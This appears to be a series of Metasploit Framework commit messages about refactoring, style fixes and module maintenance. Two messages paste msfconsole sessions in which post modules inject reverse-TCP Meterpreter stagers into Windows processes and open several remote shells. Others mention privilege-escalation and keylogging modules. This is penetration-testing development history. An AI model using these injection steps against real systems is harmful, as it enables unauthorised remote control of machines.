* Adds support for MATCHUSER regex option
* Adds support for OSX 10.8 and 10.9 hashes (PBKDF2)
* DRYs up a bunch of older code, adds lots of helper fns
* Ends up shaving off ~20 lines
There is some bug that I haven't been able to track down that causes the
osx call to run the event queue to just hang on latest OSX + Java/python
meterpreter. I tried rewriting these modules using OSX's new Media API,
but I run into the same problem. Until I find a solution, we should mark
these shell-only.
Adds support to load a dll and identify the ReflectiveLoader offset.
Adds support to inject dll into process and execute it.
Updates kitrap0d, ppr_flatten_rec, reflective_dll_inject modules and
payload modules to use above features.
Now broken into two modules, one for loading RDI DLLs off disk and
finding the loader function offset, and another for doing the process
specific stuff of loading into the target.
MSF was starting to see more modules using RDI to load binaries into
remote processes, so it made sense to create a mixin which contained
the functionality that was being used in various locations.
This commit contains the new mixin, and adjustments to all the existing
exploits and modules which use RDI.
* Meterpreter seems to fall over on the cmd escaping, and dies if you
try to pass it an array of args (python/java meterpreter on various versions
of osx).
* Make PROTOCOL an Enum
* Move path override options to advanced section
* More Enumerable rework
* Move one-off regexes back to inline, pull out protocol list
Updated the comments and indentation so they're not blatantly wrong.
Adjusted the pxexploit module so that it doesn't break any more as
a result of the refactoring.
Looks like for some reason if CryptUnprotectData fails, the decrypt_reg()
method will return "". And when you unpack "", you produce an array of nils.
Since you cannot add something to nil, this should cause an
"undefined method `+' for nil:NilClass" error.
This will check if we get an array of nils, we jump to the next iteration.
We use system %PATH% for notepad executable instead of the absolute
path, because it caused a problem with the migrate script in a 64-bit
meterpreter session. By default the wordpad binary is not in the
%PATH%, so the condition in hp_nnm_ovbuildpath_textfile.rb was not
changed.
* Period at the end of a description.
* Methods shouldn't be meth_name! unless the method is destructive.
* "Setup" is a noun, "set up" is a verb.
* Use the clunky post module naming convention.
Added support to specify multiple payload delivery options.
msf post(payload_inject) > show options
Module options (post/windows/manage/payload_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
AMOUNT 2 no Select the amount of shells you want to spawn.
HANDLER false no Start an Exploit Multi Handler to receive the connection
LHOST XXXXXXXX yes IP of host that will receive the connection from the payload.
LPORT 4433 no Port for Payload to connect to.
OPTIONS #<Msf::OptInt:0x007f5c6439c6d8> no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
PAYLOAD windows/meterpreter/reverse_tcp no Windows Payload to inject into memory of a process.
PID no Process Identifier to inject of process to inject payload.
SESSION 1 yes The session to run this module on.
msf post(payload_inject) > set HANDLER true
HANDLER => true
msf post(payload_inject) > exploit
[*] Running module against XXXXXXXX
[*] Starting exploit multi handler
[*] Performing Architecture Check
[*] Started reverse handler on XXXXXXXX:4433
[*] Starting the payload handler...
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse TCP Stager into process ID 884
[*] Opening process 884
[*] Generating payload
[*] Allocating memory in procees 884
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[*] Sending stage (770048 bytes) to XXXXXXXX
[+] Successfully injected payload in to process: 884
[*] Performing Architecture Check
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse TCP Stager into process ID 884
[*] Opening process 884
[*] Generating payload
[*] Allocating memory in procees 884
[*] Allocated memory at address 0x00ba0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 884
[*] Post module execution completed
msf post(payload_inject) > [*] Meterpreter session 2 opened (XXXXXXXX:4433 -> XXXXXXXX:2962) at 2013-10-09 21:54:25 -0400
[*] Sending stage (770048 bytes) to XXXXXXXX
msf post(payload_inject) > [*] Meterpreter session 3 opened (XXXXXXXX:4433 -> XXXXXXXX:2963) at 2013-10-09 21:54:27 -0400
Ran into a pentest recently where I had a flaky meterpreter shell, had it launch multiple ones just to be safe. The amount datastore allows you to iterate through and spawn multiple sessions.
msf exploit(psexec) > use post/windows/manage/multi_meterpreter_inject
msf post(multi_meterpreter_inject) > show options
Module options (post/windows/manage/multi_meterpreter_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
AMOUNT 1 no Select the amount of shells you want to spawn.
HANDLER false no Start new multi/handler job on local box.
IPLIST XXXXXXXXX yes List of semicolom separated IP list.
LPORT 4444 no Port number for the payload LPORT variable.
PAYLOAD windows/meterpreter/reverse_tcp no Payload to inject in to process memory
PIDLIST no List of semicolom separated PID list.
SESSION yes The session to run this module on.
msf post(multi_meterpreter_inject) > set AMOUNT 5
AMOUNT => 5
msf post(multi_meterpreter_inject) > set HANDLER true
HANDLER => true
msf post(multi_meterpreter_inject) > set SESSION 1
SESSION => 1
msf post(multi_meterpreter_inject) > exploit
[*] Running module against XXXXXXXXX
[*] Starting connection handler at port 4444 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 5400
[*] Injecting meterpreter into process ID 5400
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 5400
[*] Meterpreter session 2 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4991) at 2013-10-09 18:04:02 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 4136
[*] Injecting meterpreter into process ID 4136
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 4136
[*] Meterpreter session 3 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4992) at 2013-10-09 18:04:08 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 4108
[*] Injecting meterpreter into process ID 4108
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 4108
[*] Meterpreter session 4 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4993) at 2013-10-09 18:04:13 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 5788
[*] Injecting meterpreter into process ID 5788
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 5788
[*] Meterpreter session 5 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4994) at 2013-10-09 18:04:19 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 1408
[*] Injecting meterpreter into process ID 1408
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 1408
[*] Meterpreter session 6 opened (XXXXXXXXX:4444 -> XXXXXXXXX:1029) at 2013-10-09 18:04:24 -0400
[*] Post module execution completed
msf post(multi_meterpreter_inject) >
Otherwise, things parsing through the loot table will treat it as binary
data, and not display it in a normal texty way, even though it's totally
readable with just a little squinting.
According to the Ruby style guide, %w{} collections for arrays of single
words are preferred. They're easier to type, and if you want a quick
grep, they're easier to search.
This change converts all Payloads to this format if there is more than
one payload to choose from.
It also alphabetizes the payloads, so the order can be more predictable,
and for long sets, easier to scan with eyeballs.
See:
https://github.com/bbatsov/ruby-style-guide#collections
msftidy is complaining, here:
keylog_recorder.rb:116 - [WARNING] File.open without binary mode
Not sure how this managed to hit upstream/master with msftidy warnings.
Protip, use an msftidy pre-commit hook. We have just such a hook script
in tools/dev, as a matter of fact, so it's just a symlink away:
https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
* Rewrites helpers to just use cmd_exec, since that works in meterpreter and shell.
* Changes _EOF_ to EOF, since that threw a harmless error in shell
commits
* Prefer using Post mixin API instead of rolling-own implementation
* Fixes whitespace
[SeeRM #5940]
These three modules are well over their deprecation dates. Making good
on that threat now.
* service_permissions: Marked for removal on 2013-01-10
* bypassuac: Marked for removal on 2013-01-04
* ms10_092_schelevator: Marked for removal on 2013-06-01
There was a disaster of a merge at 6f37cf22eb that is particularly
difficult to untangle (it was a bad merge from a long-running local
branch).
What this commit does is simulate a hard reset, by doing thing:
git checkout -b reset-hard-ohmu
git reset --hard 593363c5f9
git checkout upstream-master
git checkout -b revert-via-diff
git diff --no-prefix upstream-master..reset-hard-ohmy > patch
patch -p0 < patch
Since there was one binary change, also did this:
git checkout upstream-master data/exploits/CVE-2012-1535/Main.swf
Now we have one commit that puts everything back. It screws up
file-level history a little, but it's at least at a point where we can
move on with our lives. Sorry.